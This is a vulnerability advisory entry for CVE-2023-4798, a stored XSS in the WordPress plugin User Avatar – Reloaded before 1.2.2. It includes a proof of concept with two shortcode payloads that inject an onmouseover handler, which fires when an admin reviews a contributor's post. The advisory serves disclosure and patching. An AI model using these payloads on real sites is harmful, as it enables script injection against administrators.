User Avatar – Reloaded < 1.2.2 – Contributor+ Stored XSS | CVE 2023-4798 | Plugin Vulnerabilities

Description

The plugin does not properly sanitize and escape certain of its shortcodes attributes, which could allow relatively low-privileged users like contributors to conduct Stored XSS attacks.

Proof of Concept

As a Contributor+ create a new post and add one of the following shortcode.

[avatar user="admin" size="96" align="left" link='" onmouseover="alert(/XSS/)"' /]

[avatar user="admin" size="96" align="left" link="/" target='" onmouseover="alert(/XSS/)"' /]

Save it to be reviewed.
When an admin reviews the post and moves the mouse over the added code, the payload will be delivered.

Affects Plugins

user-avatar-reloaded

Fixed in 1.2.2

References

CVE

URL

https://blog.cleantalk.org/cve-2023-4798-user-avatar-reloaded-1-2-2-contributor-stored-xss

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

273a95bf-39fe-4ba7-bc14-9527acfd9f42

Timeline

Publicly Published

2023-09-25 (about 7 months ago)

Added

2023-09-25 (about 7 months ago)

Last Updated

2023-09-26 (about 7 months ago)

Other

Published

Title

Published

2023-01-25

Title

Post Views Count <= 3.0.2 - Contributor+ Stored XSS in Shortcode

Published

2014-08-01

Title

WP Affiliate Manager < 1.1 - Reflected Cross-Site Scripting

Published

2023-08-14

Title

Multiple Themes - Reflected XSS

Published

2022-08-25

Title

WP Forecast < 7.6 - Admin+ Stored Cross-Site Scripting

Published

2022-01-10

Title

Store Toolkit for WooCommerce < 2.3.2 - Reflected Cross-Site Scripting